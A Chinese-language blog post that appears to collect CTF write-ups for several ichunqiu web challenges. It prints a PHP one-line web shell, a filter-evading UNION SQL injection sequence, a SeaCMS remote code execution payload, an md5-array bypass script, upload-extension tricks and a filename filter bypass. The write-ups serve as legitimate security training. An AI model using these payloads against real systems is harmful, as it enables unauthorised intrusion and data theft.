两个’/‘之间的符号是正则表达式,’^’ 表示匹配开始,‘$’匹配结束,‘\w‘表示匹配字母或数字或下划线或汉字,‘*’表示匹配前面的字符0次或多次,使用PHP中的 $GLOBALS变量即可
不在变量中,就是在文件中,使用file()或者file_get_contents()或者‘);‘’
构建hello=file(“flag.php”)或者hello=file_get_contents(“flag.php”)或者hello=);show-source(“flag.php”);var_dump(
.题目提示flag在flag.php中,又是一个文件上传的题目,所以上传一句话木马。
一句话代码
<?php eval($_POST['a']); ?>上传成功后访问上传的文件,发现直接输出了
eval($_POST[‘a’]) ?>
由此判断后台代码过滤了<?和php关键字。
2.在网上找到一个一句话,修改后如下
3.上传该一句话木马。然后使用菜刀连接。即可获得flag
本题过滤了一些命令,可以使用注释绕过’<>’
使用order by
?id=1 order by 3
查看数据库
?id=1 union slec<>t 1,database(),3
查表
?id=1 union selec<>t 1,group_concat(table_name),3 from information_schema.tables where table_schema = database()
查字段
?id=1 union selec<>t 1,group_concat(column_name),3 from information_schema.columns where table_name =“info”
查数据
?id=1 union selec<>t 1,flAg_T5ZNdrm,3 from info
只要第一次传进去的value与session中的相等,则网页会输出下一个value值,通过使用md5函数不能对数组进行处理的漏洞来绕过substr(md5($value),5,4)==0的判断,使nums得值大于10即可得到flag
使用如下py:
import requests
url = “http://17fab28ee29e482a95e9cca3fa1dcb111d918b722e404654.game.ichunqiu.com/?value[]=ea”
al = [‘abcdefghijklmnopqrstuvwxyz’]
s = requests.session()
r = s.get(url)
for i in range(20):
url = “http://17fab28ee29e482a95e9cca3fa1dcb111d918b722e404654.game.ichunqiu.com/?value[]=” + r.content[0:2]
r = s.get(url)
print r.content
输出的r.content中就有flag
一点开网页,就看到一段英文:
“Hi, a CTFer. You got a file, but it looks like being broken.”
其中file有超链接。但是我没有直接点开,而是去审查了页面元素。没有结果。
0x02 fffffaaakk
点开看到一段jsfuck字符串。(字符串太长了,就不复制了)
第一反应是复制下来去控制台运行,但是运行结果显示有错误。经过对比,发现是一开始的一个字符后少了一个“]“。结果弹出"flag is not here"。
想到之前做过的几类题目中,flag is not here 有可能是暗示经过了302跳转的最后结果,或者在http响应头中。但是这会被经验套路了。结果并不是如经验所愿。拿出扫描器扫可能存在的页面或者备份,结果只扫到了“index.html”。emmmm好吧,那就说明很大程度上的答案就是在这jsfuck代码里面了。
应为是弹窗,所以想到了alert,所以我的第一个想法是去jsfuck解析网站“www.jsfuck.com/ ”里面输入alert("flag is hot here "),翻译过后有5903个字符,而网页给我们的字符有95484个字符。
好了,到这里我产生了第二个想法:应该是有其他的字符在里面,而且没有被弹出来。在这里我花了点时间看了jsfuck的构成。看到有个翻译规则是:eval => []["filter"]["constructor"]( CODE )() 。而我拿到的字符串也符合这个格式。所以我猜测flag在CODE部分。
,我把拿到的jsfuck代码扔到编辑器中,找到[“filter”]部分,扣出[ ]中间的代码放到控制台中运行,得出来的结果是:“filter”。同理,我再抠出[“constructor”]中间的内容,结果是Array [ “constructor” ]。好了,把这两部分的内容删掉,再删去最后的两个小括号,剩下的就是CODE代码。然后放到控制台中运行,结果得出:"var flag=“flag{***********}”;
凯撒加密+数字替换单词中的字母
海洋cms 漏洞直接百度就可以找到
直接构造search.php?searchtype=5&tid=&area=eval($_POST[cmd])
使用蚁剑连接,找到数据库配置文件,连接数据库即可
蚁剑查数据库报错,改一下数据格式即可
题目地址:https://www.ichunqiu.com/battalion
进入题目
咦,这是让我输题目上的12341234?
然后然后,被骗了。。
看一下源码
有东西,访问一下user.php,什么都没有。。
但是可以访问,应该是隐藏了什么东西,百度搜一下隐藏文件的类型,找到一个.bak的,数据备份文件,访问
头皮有点发麻,文件内的像是用户名,把这些用户名和刚才的密码格式丢到burp里面去爆破
根据爆出的用户名密码进行登录
隐藏部分感觉像是上传的东西,用火狐开发者工具把注释给去了,显示出一个上传界面
上传一个php文件
不能上传,那就修改一下后缀名,用burp进行拦截修改
好像进行了双重的过滤,更改后缀名(php的别名:php2, php3, php4, php5, phps, pht, phtm, phtml),分别进行测试,得到一条信息
存在view.php,进行访问
尝试使用file进行查询flag,view.php?file=flag
过滤了flag,更改一下,view.php?file=flflagag
出现flag
3443
3056
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
